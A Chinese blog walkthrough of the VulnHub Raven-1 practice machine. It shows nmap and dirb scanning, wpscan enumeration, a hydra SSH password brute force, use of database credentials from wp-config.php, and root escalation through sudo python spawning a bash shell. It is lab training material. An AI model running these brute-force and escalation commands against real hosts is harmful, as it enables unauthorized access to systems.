raven-1


环境搭建

环境下载:https://download.vulnhub.com/raven/Raven.ova

image-20231106131801147

信息收集

确定靶机IP地址

arp-scan -l

image-20231106132058013端口扫描

nmap 192.168.110.140 -Pn -sT -T4 -sV

image-20231106131905255

80端口开放

访问 192.168.110.140 没有发现什么东东

image-20231106133036892

flag1

在service.html源码发现flag1

image-20231107173222398

image-20231107173255174

进行目录扫描

dirb http://192.168.110.140   

扫出来wordpress目录

image-20231107092130901

wpscan扫描

image-20231107095013259

发现两个用户

image-20231107095212167

访问wordpress页面

image-20231107100423884

找到登录页面

wordpress的默认登录界面目录是/wp-login.php

image-20231107100326040

这个登陆页面没有找到可以利用的点

爆破ssh

hydra -l michael -P /usr/share/wordlists/rockyou.txt 192.168.110.140 ssh -vV

image-20231108162958367

爆破成功

michael michael

SSH登录

ssh michael@192.168.110.140

image-20231108163421854

成功登录

找可以进一步利用的信息

flag2

在 /var/www 目录下发现了flag2

image-20231108165935027

image-20231108170005325

进入网站根目录

image-20231108170115342

有很多PHP文件、

在 wp-config.php 文件里发现数据库账号密码

image-20231108170608308

连接数据库

mysql -uroot -pR@v3nSecurity

成功连接

image-20231108170823885

查看数据库里是否有有用信息

image-20231108171527782

在数据库wordpress的wp_users表里找到steven的密码只不过是被加密过的

image-20231108171632147

得到steven的密码

image-20231108172552205

成功得到steven的密码

ssh登录steven

ssh steven@192.168.110.140

登陆成功

image-20231108173030418

提权

python交换shell

sudo /usr/bin/python -c 'import pty; pty.spawn("/bin/bash")'
or
sudo /usr/bin/python -c "import os ; os.system('/bin/bash')"

提权成功

image-20231108173735067

flag3&flag4

flag3&flag4在数据库 wordpress 的wp-posts里面

image-20231108174115863


文章作者: f14g
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 f14g !
评论
  目录